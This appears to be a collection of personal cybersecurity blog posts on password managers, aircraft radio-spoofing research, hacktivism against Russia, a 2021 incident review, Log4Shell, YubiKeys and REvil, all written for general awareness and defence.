KeePass and the argument for password managers.

[Update 11th May 2022: I am going to be making changes soon to improve readability of this post, I understand it’s a little more complex than what I am aiming for.]

Passwords: So, let’s start off with the most important question, what makes a good password?

  • Passwords should be at least 14 characters in length.
  • Passwords should be unique, a different password for every account.
  • Passwords shouldn’t contain personal information, such as your birth year or even things like your old street name.
  • Passwords should be a mixture of characters; letters, numbers and symbols, as well as case differences.
  • Passwords should be kept secret, even from those you love and trust… You don’t know how seriously they take security.

Now I wanted to look at the UK NCSC’s guide and their three random word guidance. They recommend using, well… Three random words, claiming that this is more secure than “complex passwords, which can be difficult to remember and yet guessable for criminals.” (www.ncsc.gov.uk, n.d.)

NCSC Technical Director Dr Ian Levy said: “Traditional password advice telling us to remember multiple complex passwords is simply daft.” (www.ncsc.gov.uk, n.d.)

I’m going to be upfront; I disagree… Let me tell you why.

Since about 2014 I have been using a program called KeePass, this program has withstood external penetration tests I have been aware of. With the testers being unable to breach the software. This was my father’s implementation to his organization; it wasn’t adopted by all users. However, the admins had been using it, successfully keeping attackers away from important passwords.

Before I show you KeePass, I will look at the positives of the NCSCs method. The first one that springs to mind is simplicity, not every user is exactly confident installing software on their computer and coming up with three random words is certainly much simpler and easier to understand than a long list of password requirements. Secondly, compared to a password manager there is no risk of “losing” many passwords in one go. Things could sometimes break, or you may lose access to the media device that held your password database or key file, this isn’t a problem with using the 3RW method. Finally, password managers can be quite tedious… Sometimes you may find yourself frustrated and having to go in and out of a password manager multiple times across a short time span. Not just that but the act of having your database on X media and key file on Y media is intimidating to some.

Here’s the KeePass prompt you see when you have created a database, which is a simple process that you will be taken through for the first time. When you do create your database, you’ll be given the option to create a key file or link your database to your windows user account. (I believe this must be a local account, so you may need to switch account type on Windows.) I strongly suggest using one of these, this is your multi-factor authentication aspect of KeePass.

  • Something you know, your password.
  • Something you have, key file or windows user account.

We will go over MFA next and explain this in a little more detail, but for now my recommendation for a basic setup of KeePass is to just keep your database on a USB (You will need the “portable” version for this.) and the key file on your personal computer. Best practice would involve making a backup/copy of both the database and key file, this isn’t required but recommended. A common issue with this is that you’ll constantly be adding new entries to your manager, so will need to make sure you update both databases. Always save your main database, but periodically make saves to your backup maybe once a fortnight.

Here’s a KeePass database, fun fact about me: I like to name my servers after planets and workstations after satellites. (Mainly moons but inclusive of other satellites.)

We will go over creating entries and password generation in a moment, but let’s say I wanted to now log into the root account on Ganymede. For the sake of my point. I’m going to ignore potential issues with copying passwords onto VMs, a note for the geeks is to configure SSH (or RDP for windows machines) and port forwarding so you can access machines from a terminal line or software like PuTTY. I would simply right click on my Ganymede entry, click copy password and my password will be copied to my clipboard for 15 seconds to paste into my terminal line. You would likely use it for something like your Amazon account or PayPal account. The same applies for your username, the URL field is for putting the address to the website (or IP to server) and notes for… well, notes.

So how do we use KeePass to create passwords? Start by right clicking anywhere in the folder you wish to create an “entry”, then simply click add entry.

You’ll see the window on the left, click the little key next to the password box and you will be presented with a drop-down selection, click on open password generator and you will get the second window on the right pop up. This is your password generator; it lets you determine how you want your passwords to be created. This is a good place to apply those password rules, plus this will keep them all together and mean you no longer need to remember any password other than your database master key. However, do make sure you save after any edits and don’t lock yourself out of your accounts. Here would be a good place to implement a random word password, but opting for five words over three as the reward for getting into a password database is worth much more of a wait to an attacker.

Lastly here before we move towards our conclusions, let’s look at how many combinations there are if we take the 171,476 words in the dictionary and have users choose 3.

This gives us an output of 8.403325462709 × 1014 (840 trillion) possibilities, now I’m going to save us both the maths on this next one but let’s add numbers to letters and you have a different story, the number increases even more, then even more when you start randomising where capital letters may be… I’m going to say that a little bit of open-source intelligence is likely to eventually narrow down a person’s three-word password, if we’re talking about how many words the average person has in their vocabulary the estimations work out to about 20,000, that’s a significant drop from our original pool of over 170,000. We are human, one of our inherent weaknesses is sticking to what we know… Users are still going to be using words that mean things to them or set passwords like MarchTwentyTwo. Without adequately addressing these psychological factors of security, the three-word method will suffer from similar issues as we have had in the past.

In conclusion I have demonstrated a free open-source password manager that I believe is simple, whilst not as simple as the NCSCs method and many more steps to go through, I believe the use case for password managers is not going to disappear. With so many accounts nowadays, users will struggle to remember their unique passwords to every online store or their social media. Whilst the NCSC themselves are self-aware of this weakness, this means that a way to securely store their passwords is going to be required no matter what scheme you use to create them. This method will also come along with the same human level vulnerabilities that only true randomization can mitigate. Why think of a password when the application you use to store them can think of one for you?

I have decided to push these out piece by piece, this was a chunky read and if you did read it all then I am honestly thankful… You are taking steps to a safer online presence. I will demonstrate some little offensive techniques soon which will be linked into this post to give readers a much more informative experience. Additionally, as we just lightly touched on in this post there is something called Open-Source Intelligence (OSINT). We certainly will investigate when we take a look at phishing, but I encourage you to just give it a google, it’s likely something you do all the time yourself.

Come back next time where we will delve into multi-factor authentication, what is 2FA, 3FA? How effective is MFA? How can I use MFA to protect my account?

Thank you for reading, Sec rity really isn’t possible without u, Stay safe!

http://www.ncsc.gov.uk. (n.d.). NCSC lifts lid on three random words password logic. [online] Available at: https://www.ncsc.gov.uk/news/ncsc-lifts-lid-on-three-random-words-password-logic.

Planes are pretty cool! – Food for thought #3.

Just a little unstructured rambling today from me, I’m sure someone will enjoy the read…

I have begun reading through a 2016 thesis on Security in next-gen Air Traffic communication networks by Martin Strohmeier, it was brought to my attention regarding discussions about a possible use case for software defined radio. This isn’t anything new, the first proof of concept I saw of such methods was I believe from DEF CON 17 in 2009 but I can’t remember the date off the top of my head.

We can discuss some cool hacking stuff in a second, but first you need to understand how aircraft work. I’m going to briefly discuss this presentation from Usenix and their demonstrations of attacking an aircraft’s Instrument Landing System. Firstly, how this is supposed to work is done with multiple Tx (This means transmit, commonly receive and transmit are abbreviated to Rx and Tx respectively.) antennas. The localizer has the purpose of aligning the aircraft with the runway, the glideslope is responsible for controlling the rate of descent for the aircraft. The signals transmitted from these antennas are transmitted in a specific way that corresponds to the metrics the aircraft needs to measure. If you know enough about radio and security concepts then I highly recommend you read the presentation this is regarding, I’m not qualified to discuss it in too much detail but will be trying to learn more about this when I can.

So we discussed how the ILS systems are responsible for navigation during landing and very basically how they go about doing that, the presentation takes advantage of some of the behaviours of the aircraft ILS receivers. For example, they are designed to “lock on” to the strongest signal, which is brilliant when you think some airports have multiple runways and therefore multiple ILS systems so a way to figure out what one you need is required. But with what is called an “overshadow attack” an attacker can simply overpower the signals if they have enough information to carry out the attack, which is assumed due to things like FlightRadar24 allowing people to track flight paths and lots of information being already in the public domain regarding these systems. There is another called a “single-tone attack” but this is a little less straightforward than simply overpowering a signal, nevertheless I will touch on it at some point in the future after more reading.

Above, we went over a high-level explanation of one of these wireless attack types that could be orchestrated on an ILS system, just to add one of the biggest concerns I see mentioned is the relative affordability and availability of SDR modules. Now more people can carry out these attacks with less equipment than was required before, even carrying out an attack on board the aircraft… With demonstrated offsets of up to 50 metres and the added concealment an SDR may provide, this represents a serious attack vector that could be exploited to cause devastation and mass casualties.

Ok, so let’s get to some of the hacker stuff, what even brought this to my attention?

Ukrainian cyber forces have been hard at work, I was discussing this topic with some other hackers and a Ukrainian national given a “free pass” to hit Russia, whilst the topic at first was messing with these systems onboard the aircraft. Someone raised the idea of instead transmitting signals that would be expected to come from an aircraft, whilst this again isn’t a new idea… It’s been tested and even with notification and preparation caused an absolute nightmare for air traffic control. Furthermore, the opening for a denial-of-service attack is certainly worth highlighting. Nearly every system operated by a human is vulnerable to operator overload, that’s certainly not exclusive to human operators either. Just sending lots of signals could be all it takes to shut down a section of civilian airspace. It certainly would give Russian airspace controllers a hard time if it was done, however such an attack would be indiscriminate and by nature of naughty things… hard to control.

I will be looking into more of this topic in my spare time, also having just started getting competent with the cloud myself I will be looking to move this site onto an IaaS platform. However, there are many things to weigh up and I might not switch this site itself over but also need to explore the options available to me regarding things like subdomains. WordPress is fantastic and not something I want to leave for any reason, but as we move forward aacyber aspires to officially set up and be able to actively assist in keeping everyone in cyber space safe.

ALDIs DIY soldering iron is a decent buy for £9.99, even comes with 7 grams of solder. Sure, it’s not the best in the world but I’m not selling anything I make yet…

Here comes the “Cyber Army”.

Hello World…

So the Russian government finally pulled the trigger on their invasion into Ukraine, since then we have seen information warfare erupt as the Russian dictator tries to deny any wrongdoing. But I wanted to talk about the “Cyber Army” now threatening Russian government infrastructure, not the Ukrainians in particular but the world as whole.

Anonymous probably the most well known group that have been targeting Russia, dumping credentials and PGP keys from the mil.ru domain. This domain has since been geo-fenced to Russian territory. So what’s the issue… Hackers want to stand up for Ukraine and I have an issue with it?

Not just me, but many voices have spoke out about their concerns. Any party not affiliated with a government and/or its intelligence services should leave Russian systems the fuck alone. Firstly, no matter who your target is this kind of action is strictly prohibited and criminal, it will lead to consequences for anyone carrying out malicious activity… possibly prison time. Secondly, there is a significant risk to legitimate intelligence operations when a bunch of script kiddies start trampling around a system. Imagine hiding for years only to be undone because someone comes along with a drum set…

That is all, I am trying to push my skills more as of recently so the blog may slow down as I allow time for study. A little bit of a rant but it needs to be said, that’s my position on this.

Russian Threat Actors

Image Source: https://blog.malwarebytes.com/

Hello World!

Short and sweet here. With tensions between NATO and Russia rising, multiple agencies have put out advisories to keep your eyes peeled for cyber threats out of Russia. I would encourage anyone involved in security currently to view the tactics, techniques and procedures of these actors. Here’s a good report from CISA about the topic and a good read to help increase resilience to this current threat.

To keep yourself informed on the current cyberspace I recommend CyberWire Daily Podcast, the news is relevant and gives insight from experts in their fields.

Rather technical but it’s a topic that can no longer be avoided, hopefully our nations can work together to de-escalate this situation and work to improve security for citizens all around the world going forward.

2021 – A Year in review.

Hello World!

As the year of 2021 now comes to a complete closure, the effects of the new year festivities subside and teams, students and professionals sit back down in the office full time. Another year of what will surely be packed with many surprises awaits us…

2021 like 2020 was marred by the effects of the global coronavirus pandemic and a societal political divide like never before, pushing us further and further apart from each other at a time when cooperation and diversity is (as always) incredibly important within the IT industry.

That brings me onto the first topic of my review, as I will try to take a look at the situation of hybrid warfare that is happening every day. In my opinion, influence and information are the main goals of groups in the current landscape when it comes to this topic, it likely wont be in the future but we are still in very early stages. With the ability to spew misinformation & disinformation around a critical topic, such as the coronavirus or vaccines, this ability to control information and influence could be used to exacerbate another countries political unrest as well as overloading health systems worldwide. This topic isn’t specific to this year or the pandemic, as the information tactics are used worldwide almost every day… but we must ask ourselves: “Where did this information come from?”, “Is the source trustworthy?”, “Has this information been reviewed by independent experts?”.

As defenders were still feeling the effects the effects of the SolarWinds supply chain attack where more than 18,000 SolarWinds customers installed the malicious updates and were subsequently compromised last December, a new problem was found within Microsoft Exchange servers… well four of them to be precise.

A group that was given the name HAFNIUM was detected exploiting these 4 problems in the wild for information theft and espionage. HAFNIUM who Microsoft have said are “state-sponsored and operating out of China” are a sophisticated adversary that required haste from Microsoft to roll out updates. The attackers themselves would exploit the vulnerabilities in Microsoft exchange, the CVE’s associated with this attack are as follows: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. The adversary would then be looking to deploy a web shell on the server(s) they had compromised in order to further their position within the server and possibly exfiltrate information from the targets. However it wasn’t just HAFNIUM who were attempting to exploit these vulnerabilities, with mass scanning detected as taking place by threat intel teams after some time had elapsed.

Lets move to the month of May… probably the most significant month of 2021 in Cyber-Security: We saw five major attacks in these months, all of which had a significant effect on daily life for a large amount of people, they are as follows: The Colonial Pipeline ransomware attack, The Health Service Executive ransomware attack, The Waikato District Health Board ransomware attack, The JBS S.A. cyberattack and The Air India data breach.

So lets pick up on two factors here, ransomware and healthcare… Whilst I won’t elaborate too much on ransomware here as it’s nothing new and it’s not declining, nor is a prediction that “it’ll continue for 2022” worth spending oxygen on. As it’s become a constant pain in the backside over the last few years and will not be letting up soon. Instead let’s look at healthcare, other than critical infrastructure such as water, electric etc. healthcare is a key sector where an attack has the ability to not only cause damage, but also change lives and families. The problem of why healthcare find themselves susceptible to attacks lies in the critical role their staff and systems play on a daily basis, with some of these computers being relied on to save lives or computers that operate complex machinery. It increases the difficultly of upgrading these systems, not to mention the factor of cost of product AND the cost to upskill employees with the new equipment/systems… sometimes pushing the task of upgrading or patching systems down the list.

Well I’m struggling to keep it short and sweet here, but let’s move onto the month of July where we saw the Kaseya Ransomware attack which saw ransomware group REvil claim to infect more than 1 million devices, according to security firm Sophos. This was another supply chain attack as Kaseya said that less than 60 customers were affected, however the impact was felt by under 1500 downstream businesses. The crooks attempted to extort $70m in cryptocurrency from the compromised businesses, however REvil would be soon to lose their control…

In one of the first public cases of “hacking back” by the FBI that I have seen myself (I wrote a post about it that can be seen here.) There was a lot of activity by law enforcement, that sparked weeks of speculation before the FBI confirmed they had indeed compromised the group behind the attack on Kaseya and withheld the decryption key for some time. This was done in order to not tip-off the cyber gang to their activity, as a decryption key suddenly appearing would surely set alarm bells off in the criminals heads. The story had a mostly happy ending with a small number of criminals being jailed, money that was paid being recovered by law enforcement and the distribution of the universal decryptor to affected parties.

While there’s tons to potentially discuss on the topic, I’d like this to be a comfortable read… Briefly ill close by mentioning the log4j vulnerabilities, which since my last blog post have slightly escalated with more vulnerabilities being discovered in log4j on an almost weekly basis. No doubt due to hackers of all kinds swarming over log4j, as it marks one of the most significant vulnerabilities in history as noted by the initial CVSS score of 10.0, however more recent vulnerabilities are less severe. Advice as of this post is that safe versions currently are Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).

Well that’s all in my mini-review. As we look towards another year with newfound hope and motivation, I hope this year is better for all of us and to see more smiles on the faces of people as we all play our role in protecting others.

Sources: https://whatis.techtarget.com/feature/SolarWinds-hack-explained-Everything-you-need-to-know
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/
https://www.techrepublic.com/article/kaseya-supply-chain-attack-impacts-more-than-1000-companies/

Remote Code Execution in Java Apache Log4j 2 (CVE-2021-44228)

Hello World!

The Internet was rattled the last couple of days over a new critical bug found within a very ubiquitous library, current known vulnerable versions include but may not be limited to Apache Log4j versions 2.10 to 2.14.1. Patches are now mostly available and should be installed as soon as possible, 44228 is currently being exploited in the wild and there’s even been a case of log4j payloads being used with crypto miner.

Edit 4th January 2022: Updated mitigation information, current secure versions are are follows: Log4j 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6)

JNDI – Java Naming and Directory Interface.

LDAP – Lightweight Directory Access Protocol.

A basic flow chart to illustrate the attack methods. Credit: Fastly

Here’s a brief explanation of the exploit from an attackers perspective… An attacker controlled value is parsed to the logging library, the attacker then exploits the string interpolation feature inside log4j to trigger object deserialization which results in the conditions for remote code execution on the server. To put this simply for others, this allows the attacker to execute their own code on the server, essentially letting them do anything… (But this will depend on the attackers skill level.)

Since the 9th December the Cyber Security world has been scrambling to mitigate this vulnerability, there are configuration options that will allow you to disable functionalities that result in this vulnerability but that’s likely a temporary fix. Updating the vulnerable library if you have the ability to, but many people will have to wait for individual patches from the vendors of their products.

On November 24, 2021, Apache was notified about the Log4j remote code execution vulnerability by the Alibaba Cloud Security team. The exploit proof of concept was then posted to Github at 15:32 GMT on December 9, 2021, and we saw the first attempts to trigger callbacks 82 minutes later.

I also received my YubiKeys around the same time, which I haven’t completed setting up yet but plan to have a post about them up soon, it won’t be highly technical as I more want to sell the technology and get the point across why you should be using MFA and/or security keys.

Sources: https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j & Bishop Fox/YouTube

YubiKeys!

Hello World!

I finally bit the bullet and bought myself two YubiKeys and a cover for each. One for my person and one for a safe place configured as a backup.

What’s a YubiKey?

Wikipedia states: “The YubiKey is a hardware authentication device manufactured by Yubico to protect access to computers, networks, and online services that supports one-time passwords, public-key cryptography, and authentication, and the Universal 2nd Factor and FIDO2 protocols developed by the FIDO Alliance.”

Only a short post today but expect to see a post about my initial thoughts and experiences using the YubiKey. There’s currently some cool Black Friday deals going on and I would advise you take a look if you want to step up your account security with YubiKeys!

Combined with a password manager and multi-factor authentication (where the YubiKey comes in.) This will stop nearly all attempts against your accounts… I have heard of a 99% figure for just 2FA being enabled but don’t have a source at this moment for that figure.

REvil on the run!

Hello World!

Ransomware hackers and affiliates of the REvil (Ransomware Evil), also known as Sodinokibi are on the run from the feds this week, one can suspect that the US authorities have it out for them as this is not the first occasion of direct engagement against this threat actor (TA).

If you follow the story closely like I do, then you might already be aware about the kerfuffle with the decryption keys a few months ago now, but the official story about it only dropped a couple weeks ago. Basically, one of Kaseya’s IT management platforms was compromised in what we call a supply chain attack, the method being to hold the companies that use this platform and their data to ransom.

This is achieved through the used of a piece of malware known as Ransomware, which falls under the category of Crypto-malware, see the image below for a look at what a user infected with the WannaCry ransomware would see after being infected.

So, what did I mean when I said this isn’t the first engagement… and the recent news of the official story?

Well the gang took themselves “offline” after attracting too much attention after their attack on Kaseya… Then re-emerged from the shadows a few months later. What the gang and their affiliates were unaware of is that a campaign by international law enforcement had; compromised their systems; exfiltrated information and most importantly here… Had already compromised the backups that REvil has used to restore their infrastructure. So you can see who has the upper hand in this situation.

To step away from the story of REvil and their fight with government hackers. (Which isn’t going so well for the criminals, who have seen multiple arrests across countries.) It would be good to have a brief talk about what we do to defend against ransomware and just how much the battlefield is evolving. Firstly let’s go all the way back to 1989 when the AIDS Trojan first made it’s way onto computers via the medium of floppy disk, this was the first documented case of a ransomware attack. Victims were requested to mail cash to a PO address in Panama, however security researchers were able to quickly develop tools that would decrypt the data relatively easily.

Now, you don’t need to know too much about how it’s changed over the years to the technical details about how it encrypts, installs and so on. But let’s step back into 2021 and nearly 2022 as I write this… Ransomware is no longer just about a “denial of service” to the data, but we have seen the rise of double-extortion where they not only encrypt your data but also exfiltrate, and threaten to make it public too!

Our security methods change all the time, but active defence could play an important role in the defence against these double extortion attacks. If a network defender can keep creating file shares padded with random but legitimate looking information, use telemetry simulators to confuse the attackers and many other techniques that can give the defender an upper hand.

I look forward to hopefully taking a look at some methods that would be used to stall an attack as it happens, but will recommend a book to any security professional interested in the idea of a cyber-battlefield as it’s a brilliant read… Adversarial Tradecraft in Cybersecurity by Dan Borges.